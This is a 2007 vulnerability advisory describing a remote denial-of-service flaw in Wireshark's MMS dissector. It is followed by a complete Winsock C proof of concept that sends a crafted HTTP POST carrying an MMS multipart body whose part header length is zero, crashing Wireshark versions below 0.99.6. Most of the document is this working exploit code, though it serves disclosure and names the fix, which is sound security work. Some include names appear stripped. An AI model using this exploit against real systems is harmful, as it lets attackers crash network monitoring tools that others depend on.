Title
=====
WireShark MMS Remote Denial of Service vulnerability

Date
====
13 August 2007

Affected Software
=================
WireShark < 0.99.6
Maybe all version of Ethereal

Overview
========
MMS message parse flaw in WireShark implementation may allow a remote attacker to crash it causing denial of service.

Vulnerability Description
=====================
MMS means "Multimedia Messaging Service". When WireShark parsing a MMS message which Content-Type is application/vnd.wap.multipart.mixed, and the header len of a multipart content equels to 0x00, then it will be crash.

Solution
========
Update to 0.99.6

PoC
================================
//main.cpp
/*
 * Crash reproducer for the MMS dissector bug described above: it opens a TCP
 * connection to a host/port given on the command line and sends one HTTP POST
 * whose body is the MMS message in mms[] below, so that a capturing Wireshark
 * (< 0.99.6) dissects it.  Windows/Winsock only (WSAStartup, SOCKET,
 * #pragma comment(lib, "ws2_32")).
 *
 * NOTE(review): the two header names after #include were lost in the page
 * extraction (angle brackets stripped); the code uses Winsock and the C
 * stdio/string functions.
 */
#include
#include
#pragma comment(lib, "ws2_32")

/* Fixed part of the HTTP request; the body is labelled as an MMS message. */
char *http = "POST / HTTP/1.0\r\n"
             "Content-Type: application/vnd.wap.mms-message\r\n";
/* Formatted with argv[1] (host) and argv[2] (port) in main(). */
char *hoststr = "Host: %s:%d\r\n";
/* Formatted with sizeof(mms); ends the header block with the blank line. */
char *contentlenstr = "Content-Length: %d\r\n\r\n";

/*
 * Encoded MMS m-send-req (MMS binary header encoding) whose body is a
 * multipart/mixed container with a single part.  The only byte that matters
 * for the crash is the part's header length (marked below); everything else
 * is a well-formed message.
 */
unsigned char mms[] = {
    0x8c,0x80,//X-Mms-Message-Type: m-send-req(0x80)
    0x98,0x7a,0x77,0x65,0x6c,0x6c,0x00,//X-Mms-Transaction-ID: zwell
    0x8d,0x92,//X-Mms-MMS-Version: 1.2
    0x97,0x31,0x33,0x35,0x31,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x00,//To: 13510000000
    0x84,0xa3,//Content-Type: application/vnd.wap.multipart.mixed
    //////////////////////////////////////////////////
    0x01,//multipart,count
    0x0f,//HeadersLen
    0x05,//DataLen
    0x00,//headlen <<<=== A header length of 0x00 for this part is what crashes
         //Wireshark < 0.99.6 (the dissector does not reject it); the real value
         //for the three header lines that follow is 0x0e.  Fixed by updating,
         //see "Solution" above.
    ///
    0x83,0x85,//Utf-8
    0x7a,0x77,0x65,0x6c,0x6c,0x2e,0x74,0x78,0x74,0x00,//Name: zwell.txt
    0x81,0xea,//Charset: utf-8
    ///
    0x7a,0x77,0x65,0x6c,0x6c,//zwell
};

/*
 * Resolve host h, open a TCP socket and connect it to port p.
 *
 * Returns the connected socket.  Every failure (resolution, socket creation,
 * connect) prints a message and exits the process with -1 rather than
 * returning, so the caller never sees an invalid socket.
 */
SOCKET connect_to_host(char *h, int p)
{
    SOCKET sock;
    struct hostent *host;
    struct sockaddr_in saddr;

    if((host=gethostbyname(h))==NULL)
    {
        printf("resolv host %s error\n", h);
        exit(-1);
    }
    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
    {
        printf("create socket error\n");
        exit(-1);
    }
    memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
    saddr.sin_family=AF_INET;
    // Copies the first resolved address through an unsigned long pointer;
    // assumes unsigned long is 32 bits wide (true on Windows) and that the
    // address is IPv4 — on other platforms this would read past the 4 bytes.
    saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
    saddr.sin_port=htons(p);
    if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0)
    {
        printf("connect to host %s on port %d error\n", h, p);
        exit(-1);
    }
    return sock;
}

/*
 * Initialise Winsock 2.0.  The WSAStartup result is not checked, so a failed
 * initialisation is only noticed when socket() fails in connect_to_host().
 */
void socket_init()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2,0), &wsaData);
}

/*
 * Entry point: usage is <host> <port> (argv[1], argv[2]).  Builds the HTTP
 * request in sendbuf and sends it once; the socket is never closed and
 * WSACleanup is never called, the process simply returns.
 */
int main(int argc, char **argv)
{
    SOCKET s;
    // 1024-byte request buffer.  None of the strcpy/sprintf/memcpy calls
    // below check the remaining space; the fixed headers plus sizeof(mms)
    // fit comfortably, but the hostname from argv[1] is copied unbounded.
    char sendbuf[1024];
    int len = 0;

    printf("WireShark<0.99.6 MMS protocol DOS PoC\nCoded By ZwelL\nhttp://www.nosec.org\n");
    if(argc != 3)
    {
        // NOTE(review): the host/port placeholders of this usage line appear
        // to have been stripped by the page extraction, like the #include
        // names above.
        printf("usage : %s \n", argv[0]);
        exit(-1);
    }
    socket_init();
    // atoi() gives 0 for a non-numeric port; connect() then fails and exits.
    s = connect_to_host(argv[1], atoi(argv[2]));

    strcpy(&sendbuf[len], http);
    len += strlen(http);
    sprintf(&sendbuf[len], hoststr, argv[1], atoi(argv[2]));
    len = strlen(sendbuf);
    // sizeof(mms) is a size_t printed with %d; harmless for this small array.
    sprintf(&sendbuf[len], contentlenstr, sizeof(mms));
    len = strlen(sendbuf);
    // Body is binary, so it is appended with memcpy rather than a string call.
    memcpy(&sendbuf[len], mms, sizeof(mms));
    len += sizeof(mms);
    // Return value of send() (bytes actually sent, or SOCKET_ERROR) is ignored.
    send(s, sendbuf, len, 0);
    printf("completed!\n");

    return 0;
}